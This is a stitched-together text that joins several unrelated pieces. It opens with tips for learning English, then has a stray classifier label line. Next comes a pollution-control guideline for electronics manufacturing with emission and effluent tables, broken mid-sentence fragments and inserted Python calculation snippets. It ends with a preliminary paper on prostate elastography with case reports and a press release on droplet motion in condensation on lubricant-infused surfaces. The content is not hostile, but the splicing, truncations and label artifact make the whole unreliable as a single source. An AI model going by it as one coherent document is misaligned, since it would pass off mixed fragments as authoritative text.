First of all, you must want to learn. If you are not interested in learning English, no class will help you, no book will help you, and no hints will make it easier. If you are not interested, you will find reasons to avoid studying, and whenever you do study, it will be very difficult. So you have to be honest with yourself. Ask yourself, "Do I really want to learn English?" If you can't answer "yes" to this question, it is better for you to set English aside until you're ready and willing to learn.
2. Identify your motivation.
Next, you need to identify your motivation. Ask yourself, "Why do I want to learn English? Why do I want to improve my English?" Some people want to learn English to get a better job, or to be considered for a promotion. Other people may need to learn English to attend university or school. Still other people may want to learn English so they can enjoy life in America more, by being able to understand movies and TV, and make friends with their American neighbors. Each person is different, so their motivations will be different also. If you have identified your motivation, it will be easier for you to learn English, because it will help to encourage you as you learn English.
3. Set goals.
Once you have identified your motivation, you can set some goals for learning English. Having goals will help you to remember what areas you want to work on, and it will help you to see your progress.
Ask yourself, "What are my goals? What areas would I like to improve?" Pronunciation? Listening comprehension? Would you like to increase your vocabulary? Do you want to know what to say when you go to the bank, the doctor, shopping? Think about what your goals are, and review once in a while to see that you are making progress toward your goals.
4. Practice, practice, practice.
After you have set your goals, you have a better idea of what you need to practice. Just like the athlete whose goal is the Olympics must train daily, you as a language learner must practice language every day to make progress toward your goal. We say, "Practice makes perfect." This means the more you practice something, the better you become at it, and the fewer mistakes you will make.
Specific ways to practice:
- Speak to native English speakers as much as possible.
- Write, write, write – letters, email, notes, etc.
- Make phone calls to practice your English.
5. Expose yourself to English as much as possible.
The more you expose yourself to English, the more you get used to it and the more familiar it becomes to you. You will start to recognize what sounds right and what sounds wrong. You will also start to understand why certain words or phrases are used instead of others, and you will start to use them in your own conversations and writing. English will start to become a habit, and little by little you will find it easier to use English.
Specific ways to increase exposure to English:
- Watch TV and movies.
- Listen to the radio.
- Read as much as possible.
6. Enlarge your vocabulary.Having a large vocabulary is basic to learning any language, and it is especially true in English. Reading is a very good way to learn new words. So is doing puzzles or playing different kinds of word games.
|
__label__pos
| 0.908773
|
Electronics Manufacturing

The electronics industry includes the manufacture of passive components (resistors, capacitors, inductors); semiconductor components (discretes, integrated circuits); printed circuit boards (single and multilayer boards); and printed wiring assemblies. This chapter addresses the environmental issues associated with the last three manufacturing processes. The manufacture of passive components is not included because it is similar to that of semiconductors. (A difference is that passive component manufacturing uses less of the toxic chemicals employed in doping semiconductor components and more organic solvents, epoxies, plating metals, coatings, and lead.)

Semiconductors. Semiconductors are produced by treating semiconductor substances with dopants such as boron or phosphorus atoms to give them electrical properties. Important semiconductor substances are silicon and gallium arsenide. Manufacturing stages include crystal growth; acid etch and epitaxy formation; doping and oxidation; diffusion and ion implantation; metallization; chemical vapor deposition; die separation; die attachment; postsolder cleaning; wire bonding; encapsulation packaging; and final testing, marking, and packaging. Several of these process steps are repeated several times, so the actual length of the production chain may well exceed 100 processing steps. Between the repetitions, a cleaning step that contributes to the amount of effluent produced by the process is often necessary. Production involves carcinogenic and mutagenic substances and should therefore be carried out in closed systems.

Printed circuit board (PCB) manufacturing. There are three types of boards: single sided (circuits on one side only), double sided (circuits on both sides), and multilayer (three or more circuit layers). Board manufacturing is accomplished by producing patterns of conductive material on a nonconductive substrate by subtractive or additive processes. (The conductor is usually copper; the base can be pressed epoxy, Teflon, or glass.) In the subtractive process, which is the preferred route, the steps include cleaning and surface preparation of the base, electroless copperplating, pattern printing and masking, electroplating, and etching.

Printed wiring assemblies. Printed wiring assemblies consist of components attached to one or both sides of the printed circuit board. The attachment may be by through-hole technology, in which the legs of the components are inserted through holes in the board and are soldered in place from underneath, or by surface mount technology (SMT), in which components are attached to the surface by solder or conductive adhesive. (The solder is generally a tin-lead alloy.) In printed circuit boards of all types, drilled holes may have to be copper-plated to ensure interconnections between the different copper layers. SMT, which eliminates the drilled holes, allows much denser packing of components, especially when components are mounted on both sides. It also offers higher-speed performance and is gaining over through-hole technology.
Waste Characteristics
Air Emissions

Potential air emissions from semiconductor manufacturing include toxic, reactive, and hazardous gases; organic solvents; and particulates from the process. The changing of gas cylinders may also result in fugitive emissions of gases. Chemicals in use may include hydrogen, silane, arsine, phosphine, diborane, hydrogen chloride, hydrogen fluoride, dichlorosilane, phosphorous oxychloride, and boron tribromide.

Potential air emissions from the manufacture of printed circuit boards include sulfuric, hydrochloric, phosphoric, nitric, acetic, and other acids; chlorine; ammonia; and organic solvent vapors (isopropanol, acetone, trichloroethylene, n-butyl acetate, xylene, petroleum distillates, and ozone-depleting substances). In the manufacture of printed wiring assemblies, air emissions may include organic solvent vapors and fumes from the soldering process, including aldehydes, flux vapors, organic acids, and so on.

Throughout the electronics manufacturing sector, chlorofluorocarbons (CFCs) have been a preferred organic solvent for a variety of applications. CFCs are ozone-depleting substances (ODSs). Their production in and import into developing countries will soon be banned. Hydrochlorofluorocarbons (HCFCs) have been developed as a substitute for CFCs, but they too are ODSs and will be phased out. Methyl chloroform, another organic solvent, has also been used by the electronics industry; it too is an ODS and is being eliminated globally on the same schedule as CFCs. Chlorobromomethane and n-propyl bromide are also unacceptable because of their high ozone-depleting potential.

Effluents

Effluents from the manufacture of semiconductors may have a low pH from hydrofluoric, hydrochloric, and sulfuric acids (the major contributors to low pH) and may contain organic solvents, phosphorous oxychloride (which decomposes in water to form phosphoric and hydrochloric acids), acetate, metals, and fluorides. Effluents from the manufacture of printed circuit boards may contain organic solvents; vinyl polymers; stannic oxide; metals such as copper, nickel, iron, chromium, tin, lead, palladium, and gold; cyanides (because some metals may be complexed with chelating agents); sulfates; fluorides and fluoroborates; ammonia; and acids.
Effluents from printed wiring assemblies may contain acids, alkalis, fluxes, metals, organic solvents, and, where electroplating is involved, metals, fluorides, cyanides, and sulfates.
eliminates a process step and the corresponding equipment, and has been shown to give adequate product quality according to the application.

General

Organic solvent losses can be reduced by conservation and recycling, using closed-loop delivery systems, hoods, fans, and stills. Installation of activated carbon systems can achieve up to 90% capture and recycle of organic solvents used in the system. All solvents and hazardous chemicals (including wastes) require appropriate safe storage to prevent spills and accidental discharges. All tanks, pipework, and other containers should be situated over spill containment trays with dimensions large enough to contain the total volume of liquid over them. Containment facilities must resist all chemical attack from the products. In lieu of containment facilities, the floor and walls, to a reasonable height, may be treated (e.g., by an epoxy product, where chemically appropriate) to prevent the possibility of leakage of accidental spills into the ground, and there should be doorsills. (Untreated cement or concrete or grouted tile floors are permeable.) It is unacceptable to have a drain in the floor of any shop where chemicals of any description are used or stored, except where such a drain leads to an adequate water-treatment plant capable of rendering harmless used or stored chemicals in its catchment area. Waste organic solvents should be sent to a solvent recycling operation for reconstitution and reuse. Where recycling facilities are not available, waste solvents may need to be incinerated or destroyed as appropriate for their chemical composition.
gies should be considered where available. Solder dross should not be sent to landfills. (Waste can be sent to suppliers or approved waste recyclers for recovery of the lead and tin content of the dross.) Scrap boards and assemblies having soldered components should have their components and solder connections removed before they are sent to landfills or recycled for other uses.
Treatment Technologies
Wet scrubbers, point-of-use control systems, and volatile organic compound (VOC) control units are used to control toxic and hazardous emissions of the chemicals used in semiconductor manufacturing. It is often appropriate to scrub acid and alkaline waste gases in separate scrubbers because different scrubber liquids can then be used, resulting in higher removal efficiencies. Air emission concentrations of chemicals such as arsine, diborane, phosphine, silane, and other chemicals used in the process should be reduced below worker health levels for plant operations. Because of the many chemicals used in the electronics industry, wastewater segregation simplifies waste treatment and allows recovery and reuse of materials. Organic wastes are collected separately from wastewater systems. (Note that solvent used in the semiconductor industry cannot be readily recycled because much of it is generated from complex mixtures such as photoresist.) Acids and alkalis are sent to onsite wastewater treatment facilities for neutralization, after segregation of heavy-metal-bearing streams for separate treatment. Fluoride-bearing streams in a semiconductor plant are segregated and treated on site or sent off site for treatment or disposal. Treatment steps for effluents from the electronics industry may include precipitation, coagulation, sedimentation, sludge dewatering, ion exchange, filtering, membrane purification and separation, and neutralization, depending on the particular stream. Sanitary wastes are treated separately (primary and secondary treatment followed by disinfection) or discharged to a municipal treatment system.
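As a rough illustration of the neutralization step described above, the lime demand of an acidic stream can be estimated from simple stoichiometry. The stream composition below is hypothetical, and real dosing is set by jar tests and pH control rather than stoichiometry alone:

```python
# Rough lime-dosing estimate for neutralizing an acidic effluent stream.
# Stream composition is HYPOTHETICAL; shown only to illustrate the
# chemistry behind the neutralization step.
M_HCL = 36.46    # molar mass of HCl, g/mol
M_CAOH2 = 74.09  # molar mass of Ca(OH)2, g/mol

def lime_dose_g_per_m3(hcl_mg_per_l: float) -> float:
    """Stoichiometric Ca(OH)2 demand: Ca(OH)2 + 2 HCl -> CaCl2 + 2 H2O."""
    mol_hcl_per_m3 = hcl_mg_per_l / M_HCL   # mg/L is numerically g/m3
    return (mol_hcl_per_m3 / 2.0) * M_CAOH2  # grams of lime per m3 treated

dose = lime_dose_g_per_m3(100.0)  # e.g., a stream carrying 100 mg/L HCl
```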
Emissions Guidelines
Emissions levels for the design and operation of each project must be established through the environmental assessment (EA) process on the basis of country legislation and the Pollution Prevention and Abatement Handbook, as applied to
local conditions. The emissions levels selected must be justified in the EA and acceptable to the World Bank Group. The guidelines given below present emissions levels normally acceptable to the World Bank Group in making decisions regarding provision of World Bank Group assistance. Any deviations from these levels must be described in the World Bank Group project documentation. The emissions levels given here can be consistently achieved by well-designed, well-operated, and well-maintained pollution control systems. The guidelines are expressed as concentrations to facilitate monitoring. Dilution of air emissions or effluents to achieve these guidelines is unacceptable. All of the maximum levels should be achieved for at least 95% of the time that the plant or unit is operating, to be calculated as a proportion of annual operating hours.

Air Emissions
The air emissions levels presented in Table 1 should be achieved.

Liquid Effluents
The effluent levels presented in Table 2 should be achieved.

Ambient Noise
Noise abatement measures should achieve either the levels given below or a maximum increase in background levels of 3 decibels (measured on the A scale).

Table 1. Air Emissions from Electronics Manufacturing (milligrams per normal cubic meter)

Parameter             Maximum value
VOC                   20
Phosphine             1
Arsine                1
Hydrogen fluoride     5
Hydrogen chloride     10
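The 95% availability requirement can be checked directly against monitoring records. A minimal sketch (the function name and the hour figures are illustrative, not part of the guideline):

```python
def meets_guideline(exceedance_hours: float, operating_hours: float,
                    required_fraction: float = 0.95) -> bool:
    """True if limits were met for at least the required fraction
    of annual operating hours."""
    return (operating_hours - exceedance_hours) / operating_hours >= required_fraction

# A plant operating 8,000 h/yr may exceed a limit for at most 400 h.
print(meets_guideline(380, 8000))   # -> True
print(meets_guideline(420, 8000))   # -> False
```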
Table 2. Effluents from Electronics Manufacturing (milligrams per liter, except pH)

Parameter                                     Maximum value
pH                                            6–9
BOD                                           50
TSS
  Maximum                                     50
  Monthly average                             20
Oil and grease                                10
Phosphorus                                    5.0
Fluoride                                      20
Ammonia                                       10
Cyanide
  Total                                       1.0
  Free                                        0.1
Total chlorocarbons and hydrochlorocarbons    0.5
Metals, total                                 10
Arsenic                                       0.1
Chromium, hexavalent                          0.1
Cadmium                                       0.1
Copper                                        0.5
Lead                                          0.1
Mercury                                       0.01
Nickel                                        0.5
Tin                                           2.0
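As an illustration of how the Table 2 limits might be applied in routine monitoring, the sketch below flags parameters in an effluent sample that exceed their guideline maxima. The sample values are hypothetical, and only a subset of parameters is shown:

```python
# Guideline maxima from Table 2 (mg/l); a subset for brevity.
LIMITS_MG_PER_L = {"BOD": 50, "TSS": 50, "Fluoride": 20, "Copper": 0.5, "Lead": 0.1}

def violations(sample_mg_per_l):
    """Map each out-of-limit parameter to its measured concentration."""
    return {p: c for p, c in sample_mg_per_l.items() if c > LIMITS_MG_PER_L[p]}

# Hypothetical sample: only TSS is above its 50 mg/l maximum.
sample = {"BOD": 32.0, "TSS": 61.5, "Fluoride": 8.0, "Copper": 0.2, "Lead": 0.04}
print(violations(sample))  # -> {'TSS': 61.5}
```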
Maximum allowable ambient noise levels, in dB(A):

Receptor                                    Day (07:00–22:00)    Night (22:00–07:00)
Residential, institutional, educational     55                   45
Industrial, commercial                      70                   70
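Sound levels combine energetically rather than arithmetically, which is why the 3-decibel allowance corresponds to a doubling of acoustic power. A short check (the background level used is illustrative):

```python
import math

def combine_levels(levels_db):
    """Energetic sum of sound pressure levels in dB(A)."""
    return 10 * math.log10(sum(10 ** (L / 10) for L in levels_db))

# Adding a plant exactly as loud as a 55 dB(A) background raises the
# combined level by about 3 dB -- the maximum increase the guideline permits.
background = 55.0
combined = combine_levels([background, background])
print(round(combined - background, 2))  # -> 3.01
```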
Key Issues

[…] and fitted with leak detection devices as appropriate. Well-designed emergency preparedness programs are required. Note that fugitive emissions occurring when gas cylinders are changed do not normally require capture for treatment, but appropriate safety precautions are expected to be in place.

No ozone-depleting chemicals should be used in the process unless no proven alternatives are available. Equipment, such as refrigeration equipment, containing ozone-depleting chemicals should not be purchased unless no other option is available.

Toxic and hazardous sludges and waste materials must be treated and disposed of or sent to approved waste disposal or recycling operations.

Where liquid chemicals are employed, the plant, including loading and unloading areas, should be designed to minimize evaporation (other than water) and to eliminate all risk of chemicals entering the ground or any watercourse or sewerage system in the event of an accidental leak or spill.
Elastography of the prostate in the detection of prostate cancer
Dennis L. Cochlin

Introduction
This paper presents initial experience with a new Toshiba elastography imaging system used to detect prostate cancer. Since this is a preliminary evaluation, the elastography imaging procedure was performed in addition to our standard procedure of ten systematic biopsies, plus extra biopsies of suspicious areas where appropriate. The elastography images did not influence the biopsy pattern, and the elastography findings were subsequently compared with tumour detection on the biopsy cores (all cores are labelled separately) and with radical prostatectomy specimens where available.

The number of patients studied is not yet sufficient to present hard data, but the following initial impressions of the procedure, illustrative case reports and discussion of the possible role of elastography in the detection of prostate cancer may provide a starting point for further studies.

Background
With patients showing a high serum prostate specific antigen (PSA) level and/or an abnormal digital rectal examination there is a high probability (40–66 %) of clinically significant prostate cancer. The standard method to detect prostate cancer in these patients is to perform multiple biopsies of the prostate obtained in a set pattern throughout the gland, which also allows for histological (Gleason) grading of any cancer detected.

There are, however, certain problems with this procedure:
1) It is invasive and unpleasant. Multiple biopsies – at least 8 or 10 – are necessary. Repeat biopsies for a rising PSA level and a negative initial set of biopsies require more than 10 biopsies.
2) A proportion of cancers will be missed (false negative tests). The number of false negative tests is difficult to determine as there is no gold standard, but based on positivity rates on second or third biopsies the rate may be between 10 and 33 %.
3) Increasing the number of biopsy cores obtained increases positivity rates but also increases the number of "clinically insignificant" tumours found. These are small, low grade tumours that, evidence suggests, are unlikely to progress to clinically significant tumours.
4) The size of a detected tumour can be estimated from biopsy data, i.e. the number of cores involved and the length of tumour in each core. The estimate is often inaccurate because the biopsy core may just detect the edge of a large tumour, and a tumour may be multi-focal.

Because of these disadvantages, attempts are being made to visualise tumours on the ultrasound image so that biopsies can be targeted to the tumour. Greyscale ultrasound and colour Doppler studies, however, are disappointing. More recently, contrast-enhanced ultrasound and elastography imaging are being studied.

If prostate cancer could be imaged with a method that produces a high negative predictive value, then patients with negative imaging would not need biopsies. So far, no imaging method has achieved this objective, and even from an unbiased point of view it seems unlikely that elastography imaging can close this gap. There are, however, some limited, but nevertheless very important, goals that may be achieved:
1) Adding elastography-guided biopsies to the standard biopsy regime may increase positivity rates (reduce false negative results).
2) If a tumour is visualised, diagnosis can be supported by targeting the abnormal area with fewer biopsy cores than conventional biopsies.
3) The size of the tumour may be more accurately estimated, and it might be possible to distinguish significant from insignificant tumours.

Technique
The elastography system features a split screen, with one screen showing a conventional greyscale image while the other visualizes movement using colour Doppler. This is, so to speak, the basic real-time elastography image. The greyscale image allows positioning within the prostate gland. The gland is then compressed and allowed to relax by applying 3 or 4 simple "flicks" of the transducer at about 1–2 second intervals. This produces the data for the more sophisticated strain imaging.

The colour Doppler "elastography" image enables gain adjustments which optimise the elastography image. Although the colour Doppler elastography image is inherently inferior to the strain images, it is a real-time image, which means that if any suspicious areas are detected, the image plane to study these can be accurately determined.

Once the data is stored, the strain image can be produced. The process takes approximately 10 seconds, and then the image can be viewed. Depending on the number of planes examined, obtaining the data for the images adds 1 to 2 minutes to the examination. Although the patient feels the movement of the transducer during the "flicks" that compress the prostate, this is not painful or uncomfortable.

Initial impressions
1) The system is easy to use. Data acquisition takes little time. The increased time required for the scan is quite acceptable. The split screen displays a greyscale image which makes it easy to align the elastography scan plane accurately to the plane which needs to be studied. The colour Doppler overlay allows an estimate of appropriate gain settings and indicates how much movement is being produced while flicking the transducer. Obviously abnormal areas are visible in real time on the colour Doppler image.
2) The technique is not uncomfortable or painful.
3) Post-processing and measurement of the images is easy, though best practices are not yet clear. The images appear to be reproducible over a range of different pressures when flicking the transducer and over a range of gain settings. This makes the procedure highly reproducible and relatively operator-independent.
4) The method does demonstrate prostate cancer, but initial studies indicate that sensitivity is too low to use elastography as the sole examination technique.
5) Both tumours which were not visible on the grayscale images, and tumours that, as confirmed later, were only visible on the grayscale images, were detected.
6) Initial studies indicate that elastography imaging may well have a place in the detection of prostate cancer, but further research as to its precise role is required.

Case reports
Case 1: Normal study
A 32-year-old man with haematospermia was referred for transrectal ultrasound imaging of the prostate and seminal vesicles. The results showed no findings. The patient agreed to an elastography study of his prostate. The normal pattern is shown. In the figures, the greyscale image and the elastography image are displayed alongside each other (a, b). The colour Doppler image used in real time to aid acquisition of the elastography image is shown in fig. (c).

The colour scale depicts elasticity. Green is medium elasticity, red is higher elasticity, blue is less elasticity. The darker the blue, the less the elasticity. Tissues that do not react to pressure are black. The colour elastography image is overlaid onto the greyscale image. It is possible to vary the merged image from 100 % greyscale to 100 % elastography. Most of the images shown are 50 % of each.

Figs. 1.1 a and b show the mid-gland in the transverse plane. A continuous band of green (medium elasticity) is seen across the posterior gland. This does not correspond to the peripheral zone, which is much wider in this young man. It may be simply because the tissue nearest the transducer moves more on flicking the transducer than the more distal tissues. The more posterior part of the gland is shown in medium blue with irregular, rather random areas of green. Rotating the transducer, so that the lateral horns are in the midline of the image, results in a green band along the horns. This is often not as clearly continuous as that in the posterior gland (Figs. 1.2, 1.3). The base of the gland (Fig. 1.5) shows a similar pattern to the mid-gland (Fig. 1.4). At the apex the green band is discontinuous or often absent.

Case 2
A 58-year-old man with a serum PSA of 30.5. Digital rectal examination showed a firm left gland. Greyscale ultrasound (Fig. 2.1) showed a hypoechoic nodule in the left peripheral zone. Elastography showed a gap in the normal green band (Fig. 2.2) and, on a slightly different plane, a dark, stiff area (Fig. 2.3) that matched the hypoechoic nodule. This corresponded to positive biopsies in this area, Gleason grade 7. In cases where greyscale and elastography results match, biopsies of the abnormal area might be all that is necessary. Fig. 2.4 shows the corresponding velocity gradient image.

Case 3
A 62-year-old man with a serum PSA level of 3.9. Digital rectal examination showed an enlarged prostate with no palpable nodules. Greyscale ultrasound (Figs. 3.1 a, 3.2 a) showed no obvious focal nodules. Elastography showed loss of elasticity in the left peripheral zone laterally in the mid-gland (Fig. 3.1 a) but not in the base (Fig. 3.2 b). Biopsies revealed a Gleason 6 tumour in the area of decreased elasticity. Figs. 3.1 c and 3.1 d show elasticity measurements of the abnormal area and the corresponding area on the normal side. The difference between the graphs is obvious.

Case 4
A 58-year-old man with a serum PSA level of 9.6. Digital rectal examination was compatible with a T2A tumour on the right. Greyscale ultrasound (Fig. 4.1 a) showed a large hypoechoic area on the right extending into the transitional zone. Elastography imaging (Fig. 4.1 b) showed a matching area of decreased elasticity, shown as an area of darker blue. As the tumour was fairly anterior, the green posterior band is unaffected.

Case 5
A 65-year-old man with increased serum PSA. Digital rectal examination showed a hard gland compatible with a T2A tumour. Greyscale imaging (Figs. 5.1 a, 5.2 a) showed an inhomogeneous gland but no focal nodules. Elastography (Figs. 5.1 b, 5.2 b) showed decreased elasticity throughout the gland, with loss of most of the peripheral green band and areas of deep blue in the deeper parts of the gland. Biopsies showed extensive tumour, with Gleason 9 tumour in all 10 cores taken.

Two clinical workflows
The "easy" way to study the prostate with elastography imaging is to perform a transrectal scan of the prostate using greyscale ultrasound imaging, together with Doppler studies if this is the standard practice of the department. In addition, elastography images of the prostate are acquired. After the examination the images are reviewed and measurements are obtained as appropriate. The prostate biopsies are obtained at a later date and are planned according to the elastography results. This has the advantage of allowing ample time to analyse the images. The examination, however, becomes a two-stage procedure, which might be justified with patients with a rising serum PSA level and negative previous biopsies. With patients undergoing their first transrectal ultrasound and biopsy examination, such a two-stage procedure is more difficult to justify. If future studies were to show that this two-stage approach provides a significant advantage, either a higher positivity rate or the need for fewer biopsies, it would be acceptable.

An alternative approach is to analyse the elastography images immediately, while the transducer remains in the patient, and then to perform the biopsies with an appropriately modified pattern during the same procedure. This allows less time to analyse the images, and multiple measurements are not possible. It is, however, possible to review the images in less than 10 minutes, which means that, including the time needed to collect the elastography data for the images, the total time of the examination increases from about 15 to 30 minutes. During the analysis of the images the transducer could be removed from the rectum or could remain in place (insertion of the transducer is often the most painful part of the procedure).

The possible role of elastography imaging
Sensitivity and specificity of elastography imaging need to be assessed further, both alone and when combined with the current standard technique of ultrasound-guided systematic biopsies. It is therefore currently not possible to determine the role of elastography. Current experience, however, indicates certain possible conclusions.

Firstly, it is important to state what elastography will probably not achieve. It seems unlikely that elastography imaging alone will replace the need for ultrasound-guided systematic biopsies: it is unlikely that the negative predictive value will prove sufficient to eliminate the need for biopsies in patients with a normal examination. In cases where a lesion is detected, elastography will not eliminate the need for biopsy. It is unlikely that specificity will be sufficiently high to make an absolute diagnosis; biopsy will still be needed to confirm the diagnosis and for Gleason grading.

Nevertheless, elastography might be used in several different ways:
1) There is a group of patients who have rising serum PSA levels and who have had two or more negative sets of biopsies. In these cases it is likely that a tumour has been missed, possibly because it is in an unusual position such as the anterior part of the gland. Current practice therefore is to perform "saturation" biopsies: about 20 biopsies are obtained, including the anterior gland. This usually requires sedation or general anaesthetic. An alternative approach may be to look for the tumour using elastography. If found, it could be biopsied with far fewer cores under local anaesthesia.
2) If elastography imaging is added to grayscale imaging before biopsies are performed and a definite tumour is detected, then limited biopsies of the tumour may be all that is necessary. If no tumour is detected, systematic biopsies will still be necessary. Thus elastography could reduce the number of biopsies in a certain group of patients.
3) If elastography imaging is added to grayscale imaging before biopsies are performed, and all patients have ultrasound-guided systematic biopsies by the current standard technique plus targeted biopsies of elastography-detected lesions, this might increase positivity rates.
4) Elastography possibly assesses the size of tumours and the likelihood of extraprostatic spread. Since greyscale ultrasound is not suited for this task, MRI is often used, but is not the ideal solution either. In addition, more aggressive tumours may have a different elastography pattern than less aggressive tumours – very valuable information when assessing treatment options. Both these possibilities need to be tested.

References
Ophir J, Cespedes I, Ponnekanti H, Yazdi Y, Li X. Elastography: a quantitative method for imaging the elasticity of biological tissues. Ultrasonic Imaging 1991;13:111.
Rubens DJ, Hadley MA, Alam SK, Gao L, Mayer RD, Parker KJ. Sonoelasticity imaging of prostate cancer: in vivo results. Radiology 1995;379-383.
Lorenz A, Ermert H, Sommerfield HJ, Garcia-Schurman M, Senge T, Phillipou S. Ultrasound elastography of the prostate: a new technique for tumour detection. Ultraschall in der Medizin 2000;21(1):8-13.
Cochlin DLl, Ganatra RH, Griffiths DFR. Elastography in the detection of prostate cancer. Clinical Radiology 2002;57:1014-1020.
Pallwein L, Aigner F, Faschingbauer R, et al. Prostate cancer diagnosis: value of real-time elastography. Abdom Imaging 2008.
Pallwein L, Mitterberger M, Struve P, et al. Real time elastography in detecting prostate cancer: preliminary experience. BJU Int 2007;100:42-46.
What appeared to be erratic movement of water droplets in LIS dropwise condensation is the result of capillary forces
Condensation might ruin a wood coffee table or fog up glasses when entering a warm building on a winter day, but it’s not all inconveniences; the condensation and evaporation cycle has important applications.
New research from the McKelvey School of Engineering reveals the way in which small water droplets move in the area of influence of a larger droplet on a liquid infused surface. (Image: Weisensee lab)
Water can be harvested from “thin air,” or separated from salt in desalination plants by way of condensation. Because condensing droplets take heat with them when they evaporate, it’s also part of the cooling process in the industrial and high-powered computing arenas. Yet when researchers took a look at the newest method of condensation, they saw something strange: When a special type of surface is covered in a thin layer of oil, condensed water droplets seemed to be randomly flying across the surface at high velocities, merging with larger droplets, in patterns not caused by gravity.
“They’re so far apart, in terms of their own, relative dimensions” — the droplets have a diameter smaller than 50 micrometers — “and yet they’re getting pulled, and moving at really high velocities,” said Patricia Weisensee, assistant professor of mechanical engineering & materials science in the McKelvey School of Engineering at Washington University in St. Louis.
“They’re all moving toward the bigger droplets at speeds of up to 1 mm per second.”
Weisensee and Jianxing Sun, a PhD candidate in her lab, have determined that the seemingly-erratic movement is the result of unbalanced capillary forces acting on the droplets. They also found that the droplets’ speed is a function of the oil’s viscosity and the size of the droplets, which means droplet speed is something that can be controlled.
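One way to see why oil viscosity sets the scale of these speeds is the visco-capillary velocity, gamma/eta (interfacial tension over viscosity). The sketch below is an order-of-magnitude illustration only, not the model from the paper; the interfacial tension, the two oil viscosities, and the small prefactor standing in for the weak, unbalanced part of the meniscus force are all assumed values:

```python
def droplet_speed_scale(gamma_n_per_m, eta_pa_s, prefactor=1e-4):
    """Visco-capillary speed scale u = k * gamma / eta, in m/s.
    The prefactor k is an assumed, illustrative constant."""
    return prefactor * gamma_n_per_m / eta_pa_s

# Assumed oil-water interfacial tension ~40 mN/m; two assumed oil viscosities.
for eta in (0.01, 0.1):  # 10 and 100 mPa*s
    u_mm_s = droplet_speed_scale(0.04, eta) * 1e3
    print(f"viscosity {eta * 1e3:.0f} mPa*s -> speed scale ~{u_mm_s:.2f} mm/s")
```

The trend the sketch reproduces matches the finding above: a more viscous oil gives a lower droplet speed, with the magnitudes landing in the sub-mm/s to mm/s range reported for these droplets.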
Their results were published online in Soft Matter.
‘Why are they moving?’
In the most common type of condensation in industry, water vapor condenses to form a thick layer of liquid on a surface. This method is known as “filmwise” condensation. But another method has been shown to be more efficient at promoting condensation and the transfer of heat that comes along with it: dropwise condensation.
It has been used on traditionally hydrophobic surfaces — those that repel water, such as the Teflon coating on a non-stick pan. However, these traditional non-wetting surfaces degrade rapidly when exposed to hot vapor. Instead, a few years ago, researchers discovered that infusing a rough or porous hydrophobic surface with a lubricant, such as oil, leads to faster condensation. Importantly, these lubricant-infused surfaces (LIS) led to the formation of highly mobile and smaller water droplets, which are responsible for most of the heat transfer when it comes to condensation and evaporation.
During the process, however, the movement of water droplets on the surface seemed erratic — and fast. “They move at a really high velocity for their size” — about 100 microns — “just by sitting there,” Weisensee said.
“The question is, ‘Why are they moving?’ ”
Using high-speed microscopy and interferometry to watch the process play out, Weisensee and her team were able to discern what was happening and the relationships between droplet size, speed and oil viscosity.
They created water vapor and watched as small droplets formed on the surface. “The first process is that small droplets coalesce and form bigger droplets,” Weisensee said. Capillary forces cause the oil to climb up and over the droplets, forming a meniscus — not the one in your knee, but rather a curved layer of oil surrounding the droplet.
The oil is continuously moving around, trying to strike a balance as it covers different-sized droplets in different places on the surface — if a large droplet forms here, the meniscus stretches over it, causing the oil layer to contract somewhere else. Any smaller droplets in the area of contraction are swiftly pulled to the larger droplets, leading to oil-rich and oil-poor regions.
During the process, larger droplets are essentially clearing the space, which in turn makes room for the formation of more small droplets.
Since most of the heat transfer (about 85 percent) occurs via these small droplets, using LIS for dropwise condensation should be a more efficient way to dissipate heat and get water from vapor. And since the droplets are very small, less than 100 microns in diameter, condensation can occur in a smaller area.
There’s another benefit, too. During “traditional” condensation, gravity is the force that clears water from the surface, making room for new droplets to form. The surface is placed vertically, and the water simply runs off. Since capillary forces are doing the work in dropwise condensation on liquid-infused surfaces, however, the orientation of the surface is of no consequence.
“It could potentially be used on personal devices,” where orientation is constantly changing, she said, “or in space.” And because the entire process is more efficient than traditional condensation, Weisensee said, “This might be a nice way of clearing up space without having to rely on gravity.”
Going forward, Weisensee’s team will measure heat transfer to determine if the smaller droplets during dropwise condensation on LIS are, in fact, more efficient. They also plan to investigate different surfaces in order to maximize droplet movement.
The McKelvey School of Engineering at Washington University in St. Louis focuses intellectual efforts through a new convergence paradigm and builds on strengths, particularly as applied to medicine and health, energy and environment, entrepreneurship and security. With 96.5 tenured/tenure-track and 33 additional full-time faculty, 1,300 undergraduate students, 1,200 graduate students and 20,000 alumni, we are working to leverage our partnerships with academic and industry partners — across disciplines and across the world — to contribute to solving the greatest global challenges of the 21st century.